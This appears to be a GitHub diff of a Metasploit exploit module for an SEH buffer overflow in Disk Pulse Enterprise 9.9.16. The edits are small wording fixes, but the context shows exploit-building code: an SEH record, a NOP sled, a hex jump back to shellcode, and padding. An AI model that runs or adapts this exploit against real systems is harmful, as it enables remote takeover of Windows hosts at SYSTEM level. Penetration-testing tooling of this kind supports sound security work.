File tree Expand file tree Collapse file tree 1 file changed +3
-3
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -13,10 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
1313
1414 def initialize ( info = { } )
1515 super ( update_info ( info ,
16- 'Name' => 'Disk Pulse Enterprise Login Buffer Overflow' ,
16+ 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow' ,
1717 'Description' => %q{
1818 This module exploits an SEH buffer overflow in Disk Pulse Enterprise
19- 9.9.16. If a malicious user sends a malicious HTTP GET request,
19+ 9.9.16. If a malicious user sends a crafted HTTP GET request
2020 it is possible to execute a payload that would run under the Windows
2121 NT AUTHORITY\SYSTEM account.
2222 } ,
@@ -79,7 +79,7 @@ def exploit
7979 exp << generate_seh_record ( target . ret )
8080 exp << make_nops ( 10 ) # NOP sled to make sure we land on jmp to shellcode
8181 exp << "\xE9 \x25 \xBF \xFF \xFF " # jmp 0xffffbf2a - jmp back to shellcode start
82- exp << 'B' * ( 5000 - exp . length ) #padding
82+ exp << 'B' * ( 5000 - exp . length ) # padding
8383
8484 print_status ( "Sending exploit..." )
8585
You can’t perform that action at this time.
0 commit comments